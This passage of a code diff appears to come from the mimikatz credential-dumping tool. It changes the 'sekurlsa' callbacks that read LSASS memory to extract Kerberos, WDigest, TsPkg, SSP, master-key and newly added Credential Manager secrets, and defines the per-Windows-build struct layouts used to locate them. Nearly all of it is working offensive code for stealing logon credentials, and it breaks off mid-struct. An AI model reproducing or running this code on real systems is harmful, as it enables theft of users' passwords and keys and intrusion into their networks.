if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_PRIMARY_CREDENTIAL)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -9,7 +9,7 @@
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
|
||||
PVOID unk0; // lock ?
|
||||
|
||||
@ -40,22 +40,22 @@ LONG kuhl_m_sekurlsa_wdigest_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID sta
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_wdigest_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
SIZE_T taille;
|
||||
|
||||
if(kuhl_m_sekurlsa_wdigest_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_wdigest_package.Module, WDigestReferences, sizeof(WDigestReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &l_LogSessList, NULL, &offsetWDigestPrimary))
|
||||
if(kuhl_m_sekurlsa_wdigest_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_wdigest_package.Module, WDigestReferences, sizeof(WDigestReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &l_LogSessList, NULL, &offsetWDigestPrimary))
|
||||
{
|
||||
aLsassMemory.address = l_LogSessList;
|
||||
taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL);
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(aLocalMemory.address = LocalAlloc(LPTR, taille))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, taille))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + offsetWDigestPrimary), logId, 0, externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + offsetWDigestPrimary), pData->LogonId, 0, externalCallback, externalCallbackData);
|
||||
LocalFree(aLocalMemory.address);
|
||||
}
|
||||
}
|
||||
|
||||
@ -9,7 +9,7 @@
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
|
||||
struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
|
||||
|
||||
@ -6,11 +6,11 @@
|
||||
#include "kuhl_m_sekurlsa_packages.h"
|
||||
|
||||
const ANSI_STRING PRIMARY_STRING = {7, 8, "Primary"}, CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_MSV1_0_CREDENTIALS credentials;
|
||||
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
|
||||
ULONG_PTR pPrimary, pCreds = (ULONG_PTR) pCredentials;
|
||||
ULONG_PTR pPrimary, pCreds = (ULONG_PTR) pData->pCredentials;
|
||||
DWORD flags;
|
||||
|
||||
while(pCreds)
|
||||
@ -34,7 +34,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
else
|
||||
flags = 0;
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &primaryCredentials.Credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL | flags);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &primaryCredentials.Credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL | flags);
|
||||
|
||||
LocalFree(primaryCredentials.Primary.Buffer);
|
||||
}
|
||||
@ -48,65 +48,65 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
}
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_KERBEROS_LOGON_SESSION session;
|
||||
UNICODE_STRING pinCode;
|
||||
ULONG_PTR ptr;
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier), logId))
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, &session, sizeof(KIWI_KERBEROS_LOGON_SESSION), NULL))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&session.credentials, logId, 0);
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&session.credentials, pData->LogonId, 0);
|
||||
if(session.pinCode)
|
||||
if(ReadMemory((ULONG_PTR) session.pinCode, &pinCode, sizeof(UNICODE_STRING), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, logId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
|
||||
}
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
|
||||
}
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_LIVESSP_LIST_ENTRY credentials;
|
||||
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
|
||||
ULONG_PTR ptr;
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pLiveGlobalLogonSessionList, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pLiveGlobalLogonSessionList, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, &credentials, sizeof(KIWI_LIVESSP_LIST_ENTRY), NULL))
|
||||
if(ptr = (ULONG_PTR) credentials.suppCreds)
|
||||
if(ReadMemory(ptr, &primaryCredential, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, (NtBuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, (NtBuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT);
|
||||
} else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_TS_CREDENTIAL credentials;
|
||||
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
|
||||
ULONG_PTR ptr;
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pTSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId))
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pTSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, &credentials, sizeof(KIWI_TS_CREDENTIAL), NULL))
|
||||
if(ReadMemory((ULONG_PTR) credentials.pTsPrimary, &primaryCredential, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
ULONG_PTR ptr;
|
||||
BYTE buffer[offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL)];
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pl_LogSessList, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pl_LogSessList, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, buffer, sizeof(buffer), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (buffer + offsetWDigestPrimary), logId, 0);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (buffer + offsetWDigestPrimary), pData->LogonId, 0);
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
|
||||
ULONG_PTR ptr;
|
||||
@ -118,10 +118,10 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentia
|
||||
{
|
||||
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), NULL))
|
||||
{
|
||||
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
{
|
||||
dprintf("\n\t [%08x]", monNb++);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
|
||||
}
|
||||
ptr = (ULONG_PTR) mesCredentials.Flink;
|
||||
}
|
||||
@ -131,7 +131,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentia
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PLUID logId, IN PVOID pCredentials)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
|
||||
ULONG_PTR ptr;
|
||||
@ -145,7 +145,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
{
|
||||
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL))
|
||||
{
|
||||
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
{
|
||||
dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++);
|
||||
kull_m_string_displayGUID(&mesCredentials.KeyUid);
|
||||
@ -168,3 +168,76 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
|
||||
const CREDMAN_INFOS credhelper[] = {
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY_60),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, encPassword),
|
||||
},
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, encPassword),
|
||||
},
|
||||
};
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_CREDMAN_SET_LIST_ENTRY setList;
|
||||
KIWI_CREDMAN_LIST_STARTER listStarter;
|
||||
DWORD nbCred = 0;
|
||||
ULONG_PTR pCur, pRef;
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
|
||||
ULONG CredOffsetIndex;
|
||||
PBYTE buffer;
|
||||
|
||||
if(NtBuildNumber < KULL_M_WIN_BUILD_7)
|
||||
CredOffsetIndex = 0;
|
||||
else
|
||||
CredOffsetIndex = 1;
|
||||
|
||||
if(pData->pCredentialManager)
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) pData->pCredentialManager, &setList, sizeof(KIWI_CREDMAN_SET_LIST_ENTRY), NULL))
|
||||
{
|
||||
if(setList.list1)
|
||||
{
|
||||
pRef = (ULONG_PTR) setList.list1 + FIELD_OFFSET(KIWI_CREDMAN_LIST_STARTER, start);
|
||||
if(ReadMemory((ULONG_PTR) setList.list1, &listStarter, sizeof(KIWI_CREDMAN_LIST_STARTER), NULL))
|
||||
{
|
||||
if(buffer = (PBYTE) LocalAlloc(LPTR, credhelper[CredOffsetIndex].structSize))
|
||||
{
|
||||
if(pCur = (ULONG_PTR) listStarter.start)
|
||||
{
|
||||
while(pCur != pRef)
|
||||
{
|
||||
pCur -= credhelper[CredOffsetIndex].offsetFLink;
|
||||
if(ReadMemory(pCur, buffer, credhelper[CredOffsetIndex].structSize, NULL))
|
||||
{
|
||||
dprintf("\n\t [%08x]", nbCred);
|
||||
kiwiCreds.UserName = *(PUNICODE_STRING) (buffer + credhelper[CredOffsetIndex].offsetUsername);
|
||||
kiwiCreds.Domaine = *(PUNICODE_STRING) (buffer + credhelper[CredOffsetIndex].offsetDomain);
|
||||
kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = *(PUSHORT) (buffer + credhelper[CredOffsetIndex].offsetCbPassword);;
|
||||
kiwiCreds.Password.Buffer = *(PWSTR *) (buffer + credhelper[CredOffsetIndex].offsetPassword);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&kiwiCreds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS);
|
||||
pCur = (ULONG_PTR) *(PVOID *) (buffer + credhelper[CredOffsetIndex].offsetFLink);
|
||||
}
|
||||
else break;
|
||||
nbCred++;
|
||||
}
|
||||
}
|
||||
LocalFree(buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
@ -6,13 +6,14 @@
|
||||
#pragma once
|
||||
#include "kwindbg.h"
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PLUID logId, IN PVOID pCredentials);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
@ -92,7 +93,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
||||
FILETIME unk25;
|
||||
LIST_ENTRY Tickets_3;
|
||||
FILETIME unk26;
|
||||
PUNICODE_STRING pinCode; // not only PIN (CSP Info)
|
||||
PUNICODE_STRING pinCode; // not only PIN (CSP Info)
|
||||
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
|
||||
|
||||
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
|
||||
@ -170,3 +171,76 @@ typedef struct _KIWI_MASTERKEY_CACHE_ENTRY {
|
||||
ULONG keySize;
|
||||
BYTE key[ANYSIZE_ARRAY];
|
||||
} KIWI_MASTERKEY_CACHE_ENTRY, *PKIWI_MASTERKEY_CACHE_ENTRY;
|
||||
|
||||
typedef struct _CREDMAN_INFOS {
|
||||
ULONG structSize;
|
||||
ULONG offsetFLink;
|
||||
ULONG offsetUsername;
|
||||
ULONG offsetDomain;
|
||||
ULONG offsetCbPassword;
|
||||
ULONG offsetPassword;
|
||||
} CREDMAN_INFOS, *PCREDMAN_INFOS;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY_60 {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
UNICODE_STRING type;
|
||||
PVOID unk5;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
PVOID unk8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk11;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY_60, *PKIWI_CREDMAN_LIST_ENTRY_60;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
LIST_ENTRY unk4;
|
||||
UNICODE_STRING type;
|
||||
PVOID unk5;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
PVOID unk8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk11;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY, *PKIWI_CREDMAN_LIST_ENTRY;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_STARTER {
|
||||
ULONG unk0;
|
||||
PKIWI_CREDMAN_LIST_ENTRY start;
|
||||
//...
|
||||
} KIWI_CREDMAN_LIST_STARTER, *PKIWI_CREDMAN_LIST_STARTER;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
|
||||
struct _KIWI_CREDMAN_SET_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_SET_LIST_ENTRY *Blink;
|
||||
ULONG unk0;
|
||||
PKIWI_CREDMAN_LIST_STARTER list1;
|
||||
PKIWI_CREDMAN_LIST_STARTER list2;
|
||||
// ...
|
||||
} KIWI_CREDMAN_SET_LIST_ENTRY, *PKIWI_CREDMAN_SET_LIST_ENTRY;
|
||||
@ -180,4 +180,4 @@ BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid)
|
||||
status = ReadMemory(buffer, *pSid, sizeSid, NULL);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
}
|
||||
@ -52,7 +52,7 @@ typedef struct _KIWI_MSV1_0_CREDENTIALS {
|
||||
PKIWI_MSV1_0_PRIMARY_CREDENTIALS PrimaryCredentials;
|
||||
} KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_6 {
|
||||
typedef struct _KIWI_MSV1_0_LIST_60 {
|
||||
struct _KIWI_MSV1_0_LIST_6 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_6 *Blink;
|
||||
PVOID unk0;
|
||||
@ -81,7 +81,49 @@ typedef struct _KIWI_MSV1_0_LIST_6 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
} KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6;
|
||||
ULONG unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
ULONG unk23;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_60, *PKIWI_MSV1_0_LIST_60;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_61 {
|
||||
struct _KIWI_MSV1_0_LIST_6 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_6 *Blink;
|
||||
PVOID unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
ULONG unk3;
|
||||
ULONG unk4;
|
||||
ULONG unk5;
|
||||
HANDLE hSemaphore6;
|
||||
PVOID unk7;
|
||||
HANDLE hSemaphore8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
ULONG unk11;
|
||||
ULONG unk12;
|
||||
PVOID unk13;
|
||||
